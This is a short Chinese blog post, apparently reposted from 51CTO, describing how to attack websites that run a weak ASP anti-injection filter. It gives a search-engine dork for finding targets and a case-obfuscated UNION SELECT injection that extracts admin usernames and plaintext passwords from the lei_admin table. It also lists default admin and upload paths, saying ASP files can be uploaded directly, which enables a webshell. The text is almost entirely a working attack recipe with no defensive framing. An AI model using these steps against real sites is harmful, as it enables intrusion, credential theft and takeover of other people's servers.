枫叶防注入程序漏洞
關鍵字:inurl:pro_show.asp?showid=
該程序采用楓葉通用防注入1.0asp版,此防注入完全雞肋,該類型網站程序pro_show.asp
有cookies注入或者變型注入,注入前可以先判斷一下字段數:ORdeR?By?xx
注入語句:ANd?1=1?UNiOn?SElEcT?1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28?FrOm?lei_admin
字段數看個人判斷的為準
密碼為明文和明文都有,默認后臺地址:admin/index/login.asp(也有修改的)
后臺上傳地址:admin/inc/upfile.htm?可直接上傳asp文件?
上傳路徑admin/upimg/
有些后臺有雙文件上傳漏洞:admin/inc/upfiletwo.asp
有些后臺還有eweb編輯器
? ? ?本文轉自Tar0 51CTO博客,原文鏈接:http://blog.51cto.com/tar0cissp/1269470,如需轉載請自行聯系原作者
總結
- 上一篇: vpa函数python_Biopytho
- 下一篇: xz压缩文件的解压缩过程